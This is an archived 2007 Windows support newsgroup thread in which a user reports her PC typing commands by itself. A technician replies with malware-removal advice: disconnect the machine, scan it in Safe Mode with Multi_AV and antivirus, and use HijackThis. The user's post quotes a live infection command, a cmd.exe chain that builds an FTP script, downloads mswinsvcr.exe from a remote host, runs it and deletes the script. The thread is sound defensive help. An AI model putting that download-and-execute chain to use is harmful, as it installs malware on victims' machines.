Re: PC typed by itself "%systemroot%\system32\cmd.exe del eq&echo open

From: Malke <notreally@xxxxxxxxxxxxxxx>
Date: Sun, 28 Oct 2007 05:28:55 -0700

Isabella wrote:

Hi, please help me. I work from home and for a while now i'm getting this message anywhere the cursor is, so I opened notepad and was able to catched entirely as follow:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message it's always the same except for the numbers after the "eq&echo user"

Thank you in advance,

Your machine is infected. Take it off any networks and clean it up.

http://www.google.com/search?hl=en&q=mswinsvcr.exe&btnG=Google+Search

Go through these general malware removal steps systematically - http://www.elephantboycomputers.com/page2.html#Removing_Malware

Include scanning with David Lipman's Multi_AV and follow instructions to do all scans in Safe Mode. After you've done the scanning with David's utility, if you don't have a current version antivirus (not earlier than 2006) get one such as Avast and install it, update its definitions, and do a thorough scan with it in Safe Mode.

http://www.elephantboycomputers.com/page2.html#Multi-AV - instructions
http://www.pctipp.ch/downloads/sicherheit/35905/multi_av_scanning_tool.html - download site

The site is in German but David's tool is in English so don't let that worry you. Scroll all the way down to almost the bottom of the page and you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool". You'll see "Download von www pctipp.ch" and the live link to download Multi_AV.

When all else fails, run HijackThis and post your log in one of the specialty forums listed at the first link above (not here, please).

Standard caveat: If the procedures look too complex - and there is no shame in admitting this isn't your cup of tea - take the machine to a professional computer repair shop (not your local version of BigComputerStore/GeekSquad). Please be aware that not all local shops are skilled at removing malware and even if they are, your computer may be so infested that Windows will need to be clean-installed. Have all your data backed up before you take the machine into a shop.

Malke
--
Elephant Boy Computers
www.elephantboycomputers.com
"Don't Panic!"
MS-MVP Windows - Shell/User
.

Follow-Ups:
- Re: PC typed by itself "%systemroot%\system32\cmd.exe del eq&echo
  - From: Isabella

Prev by Date: Re: PC typed by itself "%systemroot%\system32\cmd.exe del eq&echo open
Next by Date: SFC /scannow asks for wrong ver cd
Previous by thread: Re: PC typed by itself "%systemroot%\system32\cmd.exe del eq&echo open
Next by thread: Re: PC typed by itself "%systemroot%\system32\cmd.exe del eq&echo
Index(es):
- Date
- Thread

Relevant Pages

Re: Dis-infecting Trojan
... Scroll all the way down to almost the bottom of the page and you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool". ... If the procedures look too complex - and there is no shame in admitting this isn't your cup of tea - take the machine to a professional computer repair shop. ... MS-MVP Windows - Shell/User ...
(microsoft.public.windowsxp.security_admin)
Re: Trojan Win32/Kvol.H
... Scroll all the way down to almost the bottom of the page and you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool". ... Not all tools used will work in Vista and you will need to run them elevated. ... If the procedures look too complex - and there is no shame in admitting this isn't your cup of tea - take the machine to a professional computer repair shop. ...
(microsoft.public.security.virus)
Re: C drive doesnt open when we double click
... Did you take the precaution of scanning your backed up data files with a current version antivirus using updated virus definitions? ... Include scanning with David Lipman's Multi_AV and follow instructions to do all scans in Safe Mode. ... Scroll all the way down to almost the bottom of the page and you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool". ... If the procedures look too complex - and there is no shame in admitting this isn't your cup of tea - take the machine to a professional computer repair shop. ...
(microsoft.public.windowsxp.basics)
Re: I cannot open property settings and add/remove programs.
... Scroll all the way down to almost the bottom of the page and you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool". ... You can also check to see if there are targeted removal steps for your malware here: ... If the procedures look too complex - and there is no shame in admitting this isn't your cup of tea - take the machine to a professional computer repair shop. ...
(microsoft.public.security.virus)
Re: Need help With CMD
... Include scanning with David Lipman's Multi_AV and follow instructions to do all scans in Safe Mode. ... Scroll all the way down to almost the bottom of the page and you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool". ... If the procedures look too complex - and there is no shame in admitting this isn't your cup of tea - take the machine to a professional computer repair shop. ...
(microsoft.public.windowsxp.general)